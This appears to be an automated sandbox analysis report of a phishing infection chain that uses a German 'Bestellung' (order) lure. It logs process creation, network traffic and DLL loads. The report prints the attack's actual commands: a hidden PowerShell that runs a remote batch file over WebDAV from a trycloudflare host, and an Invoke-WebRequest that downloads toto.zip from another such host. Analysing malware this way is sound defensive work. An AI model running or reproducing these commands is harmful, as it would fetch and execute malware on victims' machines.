Source: unknown	Network traffic detected: HTTP traffic on port 58414 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58435 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 58437 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49677 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58420 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58427 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58448
Source: unknown	Network traffic detected: HTTP traffic on port 58424 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58448 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58412
Source: unknown	Network traffic detected: HTTP traffic on port 58430 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 58417 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58434 -> 443

Source: unknown	HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.17:49703 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.17:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 173.223.108.114:443 -> 192.168.2.17:58412 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.16.230.132:443 -> 192.168.2.17:58413 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.16.230.132:443 -> 192.168.2.17:58414 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.16.230.132:443 -> 192.168.2.17:58415 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.31.73:443 -> 192.168.2.17:58416 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:58418 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.17:58419 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.31.73:443 -> 192.168.2.17:58421 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.31.73:443 -> 192.168.2.17:58426 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.23.209.166:443 -> 192.168.2.17:58428 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.16.230.132:443 -> 192.168.2.17:58430 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.16.230.132:443 -> 192.168.2.17:58435 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.16.231.132:443 -> 192.168.2.17:58442 version: TLS 1.2

System Summary

Downloads suspicious files via Chrome

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File dump: C:\Users\user\Downloads\BestellungVRG020002.zip (copy)

Jump to dropped file

Detected potential crypto function

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BF6411D8	36_2_00007FF9BF6411D8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BF641EB1	36_2_00007FF9BF641EB1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BF8B7009	36_2_00007FF9BF8B7009
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BF8B020D	36_2_00007FF9BF8B020D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFB32DA9	36_2_00007FF9BFB32DA9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFB2E0E9	36_2_00007FF9BFB2E0E9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFB130AE	36_2_00007FF9BFB130AE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFB20059	36_2_00007FF9BFB20059
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFB2A887	36_2_00007FF9BFB2A887
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFB1B098	36_2_00007FF9BFB1B098
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFB2D850	36_2_00007FF9BFB2D850
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFB1CF9D	36_2_00007FF9BFB1CF9D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFB207A5	36_2_00007FF9BFB207A5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFB1DFC4	36_2_00007FF9BFB1DFC4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFB23F7D	36_2_00007FF9BFB23F7D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFB25F3B	36_2_00007FF9BFB25F3B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFB2BEBD	36_2_00007FF9BFB2BEBD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFB1EEC4	36_2_00007FF9BFB1EEC4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFB2759D	36_2_00007FF9BFB2759D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFB295CD	36_2_00007FF9BFB295CD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFB155D0	36_2_00007FF9BFB155D0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFB2C56B	36_2_00007FF9BFB2C56B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFB1FD45	36_2_00007FF9BFB1FD45
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFB2B495	36_2_00007FF9BFB2B495
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFB2643D	36_2_00007FF9BFB2643D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFB2A3FB	36_2_00007FF9BFB2A3FB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFB26BFB	36_2_00007FF9BFB26BFB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFB1E3B7	36_2_00007FF9BFB1E3B7
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFB25BBB	36_2_00007FF9BFB25BBB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFB1EB95	36_2_00007FF9BFB1EB95
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFB152E2	36_2_00007FF9BFB152E2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFB132EF	36_2_00007FF9BFB132EF
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFB2929D	36_2_00007FF9BFB2929D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFB20AB9	36_2_00007FF9BFB20AB9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFB2621D	36_2_00007FF9BFB2621D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFB2722B	36_2_00007FF9BFB2722B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFB19A54	36_2_00007FF9BFB19A54
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFB2B19D	36_2_00007FF9BFB2B19D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFB1E189	36_2_00007FF9BFB1E189
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFB2992D	36_2_00007FF9BFB2992D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFC7C63A	36_2_00007FF9BFC7C63A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFDCD261	36_2_00007FF9BFDCD261
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFDCFBF8	36_2_00007FF9BFDCFBF8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFDC91C6	36_2_00007FF9BFDC91C6

Source: classification engine

Classification label: mal68.spyw.evad.win@50/61@6/7

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2240 --field-trial-handle=1912,i,9342714929990700637,7957857642515349934,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://dl.dropboxusercontent.com/scl/fi/kzw07ghqs05mfyhu8o3ey/BestellungVRG020002.zip?rlkey=27cmmjv86s5ygdnss2oa80i1o&st=86cnbbyp&dl=0"
Source: unknown	Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: unknown	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie theme-crack-emissions-perspectives.trycloudflare.com@SSL https://theme-crack-emissions-perspectives.trycloudflare.com/
Source: unknown	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie theme-crack-emissions-perspectives.trycloudflare.com@SSL https://theme-crack-emissions-perspectives.trycloudflare.com/
Source: unknown	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie theme-crack-emissions-perspectives.trycloudflare.com@SSL https://theme-crack-emissions-perspectives.trycloudflare.com/DE/bestellung-DKM00392pdf.lnk
Source: unknown	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell -WindowStyle Hidden -Command "cmd /c '\\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\tue.bat' analyze"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "cmd /c '\\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\tue.bat' analyze"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c \\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\tue.bat analyze
Source: unknown	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie theme-crack-emissions-perspectives.trycloudflare.com@SSL https://theme-crack-emissions-perspectives.trycloudflare.com/tue.bat
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\LSBIHQFDVT.pdf"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 5
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2276 --field-trial-handle=1564,i,7782112262489688426,12990874366865501672,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://retailer-indicators-resume-key.trycloudflare.com/toto.zip' -OutFile 'C:\Users\user\Downloads\toto.zip' } catch { exit 1 }"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2240 --field-trial-handle=1912,i,9342714929990700637,7957857642515349934,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "cmd /c '\\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\tue.bat' analyze"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c \\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\tue.bat analyze	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\LSBIHQFDVT.pdf"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 5	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://retailer-indicators-resume-key.trycloudflare.com/toto.zip' -OutFile 'C:\Users\user\Downloads\toto.zip' } catch { exit 1 }"	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2276 --field-trial-handle=1564,i,7782112262489688426,12990874366865501672,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\timeout.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior

Source: Google Drive.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
